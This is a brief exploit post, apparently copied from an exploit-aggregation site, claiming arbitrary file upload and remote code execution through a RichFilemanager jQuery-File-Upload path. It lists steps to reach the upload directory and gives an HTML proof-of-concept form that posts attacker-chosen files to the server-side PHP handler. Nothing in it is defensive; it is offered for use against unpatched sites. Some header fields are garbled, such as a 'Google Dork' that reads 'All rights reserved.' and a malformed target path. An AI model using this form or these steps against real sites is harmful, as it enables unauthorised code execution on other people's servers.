Edit Report

Our sensors found this exploit at:

Below is a copy:

Powered By Remote Code Execution
# Exploit Title: Arbritrary File Upload - Remote Code Execution
# Google Dork: All rights reserved.
# Date: 29/01/2023
# Exploit Author: UnM@SK
# Vendor Homepage:
# All Version Not Patched

1 you can go straight to the exploit
2 you access /assets/comp/RichFilemanager/scripts/jQuery-File-Upload/
3 go to exploit csrf file upload

</head><body bgcolor="white" class="intent-mouse"><center>  <h1>My Poc</h1><h1>
<font color="black"> <form method="POST" action="site.idassets/comp/RichFilemanager/scripts/jQuery-File-Upload/server/php/" enctype="multipart/form-data"> <input type="file" name="files[]"><input type="submit" name="Submit" value="Upload ?"> <center><h5></h5> idiotCrew <h5></h5> </center></form></font></h1></center>

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.